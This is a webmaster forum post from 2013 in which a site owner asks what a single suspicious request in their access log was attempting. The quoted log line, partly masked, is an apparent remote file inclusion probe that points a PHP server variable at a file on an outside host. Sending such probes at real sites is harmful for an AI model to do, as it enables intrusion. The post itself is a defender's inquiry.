homepage Welcome to WebmasterWorld Guest from
register, free tools, login, search, pro membership, help, library, announcements, recent posts, open posts,
Pubcon Platinum Sponsor 2014
Home / Forums Index / Search Engines / Search Engine Spider and User Agent Identification
Forum Library, Charter, Moderators: Ocean10000 & incrediBILL

Search Engine Spider and User Agent Identification Forum

another day, another translation

WebmasterWorld Senior Member lucy24 us a WebmasterWorld Top Contributor of All Time Top Contributors Of The Month

Msg#: 4546682 posted 6:46 am on Feb 19, 2013 (gmt 0)

I don't usually bother about one-offs, especially when it was literally a single request. But this one made me nervous. The resulting questions are equally divided between robots, Apache and PHP so we'll split the difference.

Verbatim except for a bit of camouflage and a strategically inserted blank space to prevent auto-linking:

85.10.207.nnn - - [16/Feb/2013:05:59:54 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http:/ /85.10.207.nnn/directory/filename.txt? HTTP/1.1" 200 3795 "http://example.org/" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0"

where example.org is the target site-- making the request an auto-referer-- and the 85.10. part is the visitor. Yes, it really said .txt. The IP turns out to be Hetzner (..192.0/18), so that part was a no-brainer. But...

#1 what exactly were they asking for? Is that a literal string or does the whole thing collapse to "true" or "false"? Wording exactly as shown, no leading $

#2 how come this ends up with a 200? What would an html file be doing with a query string? I don't have any AddHandler or similar funny business. Is this a config setting at the host's end, or would requests in this form always come through?

#3 where's it getting 3795 bytes? I double-checked site logs: an ordinary request for this page runs right around 1645.

All of which leads to

#4 The short answer of course is "It's up to no good". But beyond that, what exactly was it trying to do? Is this another of those attempted-proxy things?

Postscript. I'm darn glad I took the time to look into this. Closer look at logs led to the unrelated but horrifying discovery that requesting "www.example.org/index.html" results in THREE consecutive redirects. Now fixed. Brr.


Global Options:
 top home search open messages active posts  

Home / Forums Index / Search Engines / Search Engine Spider and User Agent Identification
rss feed

All trademarks and copyrights held by respective owners. Member comments are owned by the poster.
Home ¦ Free Tools ¦ Terms of Service ¦ Privacy Policy ¦ Report Problem ¦ About ¦ Library ¦ Newsletter
WebmasterWorld is a Developer Shed Community owned by Jim Boykin.
© Webmaster World 1996-2014 all rights reserved